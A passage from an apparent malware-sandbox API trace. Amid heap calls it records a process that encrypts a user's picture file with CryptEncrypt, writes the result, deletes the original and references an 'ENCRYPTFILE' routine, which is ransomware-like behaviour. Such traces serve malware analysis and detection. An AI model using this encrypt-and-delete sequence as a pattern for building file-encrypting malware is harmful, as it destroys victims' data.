RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0089.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0089.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0089.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0089.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3e7a) returned 0x4521ba8 [0089.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4521ba8 | out: hHeap=0x1780000) returned 1 [0089.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0089.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0089.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0089.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0089.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0089.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0089.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0089.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0089.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0089.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0089.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0089.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0089.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0089.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0089.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0089.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0089.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0089.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0089.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0089.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0089.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0089.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0089.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0089.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0089.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0089.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0089.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0089.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0089.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0089.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0089.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0089.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0089.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0089.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0089.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0089.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0089.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0089.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0089.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0089.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0089.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0089.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0089.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0089.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0089.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0089.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0089.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0089.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca508, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0089.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0089.583] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0089.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0089.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0089.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0089.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0089.583] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x3e7a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x3e80) returned 1 [0089.583] CharLowerBuffW (in: lpsz="byte[16001]", cchLength=0xb | out: lpsz="byte[16001]") returned 0xb [0089.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0089.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca838, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0089.584] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4521ba8*, pdwDataLen=0x144e790*=0x3e7a, dwBufLen=0x3e80 | out: pbData=0x4521ba8*, pdwDataLen=0x144e790*=0x3e80) returned 1 [0089.584] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0089.584] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0089.584] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.584] WriteFile (in: hFile=0x258, lpBuffer=0x4519e98*, nNumberOfBytesToWrite=0x3e80, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4519e98*, lpNumberOfBytesWritten=0x144f194*=0x3e80, lpOverlapped=0x0) returned 1 [0089.586] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0089.586] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.586] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0089.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca3e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0089.586] CryptDestroyKey (hKey=0x41ac700) returned 1 [0089.586] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0089.586] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0089.586] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.586] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0089.586] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0089.586] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.586] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.586] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0089.587] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0089.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0089.587] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0089.587] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.587] FreeLibrary (hLibModule=0x756e0000) returned 1 [0089.587] CloseHandle (hObject=0x298) returned 1 [0089.587] CloseHandle (hObject=0x258) returned 1 [0089.589] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kr_O D2ok83jLZ-Nq.jpg", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\kr_O D2ok83jLZ-Nq.jpg", lpFilePart=0x0) returned 0x2e [0089.589] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\kr_O D2ok83jLZ-Nq.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kr_o d2ok83jlz-nq.jpg")) returned 0x20 [0089.589] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kr_O D2ok83jLZ-Nq.jpg", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x160e5c10, ftCreationTime.dwHighDateTime=0x1d5ed64, ftLastAccessTime.dwLowDateTime=0x8e696ff0, ftLastAccessTime.dwHighDateTime=0x1d5e1c1, ftLastWriteTime.dwLowDateTime=0x8e696ff0, ftLastWriteTime.dwHighDateTime=0x1d5e1c1, nFileSizeHigh=0x0, nFileSizeLow=0x3e7a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="kr_O D2ok83jLZ-Nq.jpg", cAlternateFileName="KR_OD2~1.JPG")) returned 0x41ac600 [0089.589] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\kr_O D2ok83jLZ-Nq.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kr_o d2ok83jlz-nq.jpg")) returned 1 [0089.633] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x160e5c10, ftCreationTime.dwHighDateTime=0x1d5ed64, ftLastAccessTime.dwLowDateTime=0x8e696ff0, ftLastAccessTime.dwHighDateTime=0x1d5e1c1, ftLastWriteTime.dwLowDateTime=0x8e696ff0, ftLastWriteTime.dwHighDateTime=0x1d5e1c1, nFileSizeHigh=0x0, nFileSizeLow=0x3e7a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="kr_O D2ok83jLZ-Nq.jpg", cAlternateFileName="KR_OD2~1.JPG")) returned 0 [0089.634] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0089.634] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0089.634] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0089.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0089.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0089.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0089.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0089.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0089.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0089.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0089.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0089.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0089.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0089.635] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0089.635] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0089.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0089.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0089.635] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0089.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0089.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0089.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0089.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0089.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0089.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0089.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0089.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0089.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0089.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0089.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0089.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0089.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0089.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0089.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0089.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0089.636] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0089.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0089.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0089.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0089.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0089.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0089.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0089.637] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 